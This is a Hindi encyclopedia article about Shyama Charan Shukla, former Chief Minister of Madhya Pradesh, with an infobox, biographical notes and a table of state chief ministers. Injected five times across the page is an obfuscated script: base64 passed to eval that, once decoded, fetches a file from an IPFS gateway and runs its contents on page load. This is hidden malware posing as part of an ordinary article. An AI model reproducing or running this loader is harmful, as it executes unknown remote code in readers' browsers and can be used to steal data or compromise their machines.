श्यामा चरण शुक्ल  

श्यामा चरण शुक्ल
पूरा नाम श्यामा चरण शुक्ल
जन्म 27 फ़रवरी, 1925
जन्म भूमि रायपुर, आज़ादी पूर्व
मृत्यु 14 फ़रवरी, 2007
मृत्यु स्थान रायपुर, छत्तीसगढ़
अभिभावक पिता- रविशंकर शुक्ल
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी भारतीय राष्ट्रीय कांग्रेस
पद मुख्यमंत्री, मध्य प्रदेश (तीन बार)
कार्य काल प्रथम- 26 मार्च 1969 से 28 जनवरी 1972 तक

द्वितीय- 23 दिसंबर 1975 से 29 अप्रॅल 1977 तक
तृतीय- 9 दिसंबर 1989 से 4 मार्च 1990 तक

शिक्षा बीटेक
विद्यालय बनारस हिन्दू विश्वविद्यालय
अन्य जानकारी दैनिक महाकौशल के संपादक श्यामा चरण शुक्ल ने 1962 में राज्य विधानसभा में प्रवेश किया और निरंतर निर्वाचित होते रहे।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>श्यामा चरण शुक्ल (अंग्रेज़ी: Shyama Charan Shukla, जन्म- 27 फ़रवरी, 1925, रायपुर, आज़ादी पूर्व; मृत्यु- 14 फ़रवरी, 2007) भारतीय राष्ट्रीय कांग्रेस तथा मध्य प्रदेश के भूतपूर्व मुख्यमंत्री थे। श्यामा चरण शुक्ल तीन बार मध्य प्रदेश के मुख्यमंत्री रहे लेकिन तीनों ही बार वह पाँच साल का कार्यकाल पूर्ण नहीं कर सके। वह तीन बार 26 मार्च 1969 से 28 जनवरी 1972 तक, फिर 23 दिसंबर 1975 से 29 अप्रॅल 1977 तक और फिर 9 दिसंबर 1989 से 4 मार्च 1990 तक मुख्यमंत्री रहे।


  • श्यामा चरण शुक्ल के पिता रविशंकर शुक्ल भी मुख्यमंत्री रहे थे लेकिन किसी ने भी नहीं सोचा था कि श्यामा चरण शुक्ल भी एक दिन प्रदेश के मुख्यमंत्री बनेंगे। वह भी एक बार नहीं, दो बार नहीं बल्कि तीन बार।
  • सोचा तो किसी ने ये भी नहीं था कि तीनों बार श्यामा चरण शुक्ल 5 साल का कार्यकाल पूरा करने से रह जायेंगे।
  • श्यामा चरण शुक्ल ने जब होश संभाला था तो उनके घर में 52 कमरे थे और मेहमाननवाज़ी के लिए नौकरों की पूरी की पूरी पलटन थी। ऐसा कुछ नहीं था जो पिता के पास नहीं था और जो नहीं था, वो पिता का रसूख दिलवा सकता था।
  • बनारस हिन्दू विश्वविद्यालय से बीटेक करने के बाद श्यामा चरण शुक्ल ने पिता की तरह वकालत की और फिर नेतागिरी।
  • वरिष्ठतम राजनीतिज्ञ श्यामा चरण शुक्ल ने अपना राजनीतिक जीवन वर्ष 1942 के ‘भारत छोड़ो आंदोलन’ से शुरू किया। उन्हें तत्कालीन मध्य प्रदेश की राजनीति में प्रारंभ से ही महत्वपूर्ण भूमिका निभाते रहने का गौरव प्राप्त रहा।
  • श्यामा चरण शुक्ल रायपुर जिला कांग्रेस के अखिल भारतीय कांग्रेस पार्टी तक सदा ही महत्वपूर्ण पदों पर आसीन रहे।
  • दैनिक महाकौशल के संपादक श्यामा चरण शुक्ल ने 1962 में राज्य विधानसभा में प्रवेश किया और निरंतर निर्वाचित होते रहे।
  • उन्हें वर्ष 1969-1972, 1975-1977 तथा वर्ष 1989-1990 में मध्य प्रदेश का मुख्यमंत्री रहने का गौरव मिला।
  • 1990 में वह राज्य विधान सभा में विपक्ष के नेता रहे और फिर छत्तीसगढ़ की राजनीति में सक्रिय रहे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=श्यामा_चरण_शुक्ल&oldid=650907" से लिया गया